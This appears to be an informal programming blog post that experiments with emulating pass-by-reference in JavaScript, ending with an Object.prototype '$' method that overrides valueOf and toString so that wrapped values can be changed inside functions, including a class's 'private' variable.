function modifyVar(varName,newVal){
window[varName]=newVal;
}
var x=123;
alert(x);
modifyVar("x",321);
alert(x);


anyway, this was only valid for "Global" variables..

Then I thought about using caller.call (even do it is not exportable).

function modifyVar(varName,newVal){
modifyVar.caller.call(eval,varName+"="+newVal);
}
var x=123;
alert(x);
modifyVar("x",321);
alert(x);

anyway, this didn't work neither, there was an strange error named "Too much recursion".

Then, a lot of time after that, (actually.. yesterday), I realized that the Objects in javascript are passed as reference, so..

function modifyVar(obj,newVal){
obj.value=newVal;
}
var m={value: 1};
alert(x);
modifyVar("x",321);
alert(x);


and the attribute was modified successfully :).


Any way, this wasn't good enough, I wanted to be able to send a variable as a parameter in an instruction, and be able to modify it's content inside the function.

There's when I realize (after some testing), that I can set any variable as an object, and allow it to have any primitive value I want, for example:

var w=Object("some string");


will behave just like:

var w="some string";


and that:

var w=Object(123);


will behave just like:

var w=123;


and the same for regular expressions, functions, other objects, etc..

So by means of this, I was able to transform any variable into a "referenceable" variable.

Any way, for modifying this variable, I couldn't use any Assignment Operators, because they would destroy the Object.. I needed to modify it's contents from "inside", using it's Methods.

So I found three methods that returned the value of an object:
  • toSource();
  • toString();
  • valueOf();

The last one is the most important one, it's value is the one that will be treated "officially", except for String and Source operations.. so by doing:

function modifyVar(obj,val){
obj.valueOf=obj.toSource=obj.toString=function(){return val}
}


we would actually be modifying the value of "obj".

any way, this wasn't just enough.. I wanted a way to reference variables as easy as in C or PHP.. so.. why not making a prototype function of object that allows me to modify the variable..

so I did this:

Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};

so, variable.$("new val"); will modify the content of variable, "globally".

Here you can see the way this works:

// Object reference maker
Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};


function value(variable){
// function to modify the variable through =
variable="new_value";
}

function reference(variable){
//function to modify the variable through reference
variable.$("new_value");
}

var w="standard"; // standard value

w=Object(w);// transform to object.
alert(w); // show that the value is still the same
// standard
value(w); // try to change it's content's via =
alert(w); // show if the content's have been modified
// standard
reference(w); // try to modify the content's via reference
alert(w); // show the new value
// new_value


Hope this is useful for anybody that requires to modify a "private" variable where it's not accessible.. here is an example of Object, and a way to modify its private variables (which shouldn't be possible due to the O.O.P. Paradigm)..

Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};
function DownTown(){
var private=Object("You cant modify me");
this.get=function(){
return private;
}
this.export=function(callback){
callback(private);
}
}
var blackbox=new DownTown();
alert(blackbox.get());
blackbox.export(function(x){x.$("new val!")});
alert(blackbox.get());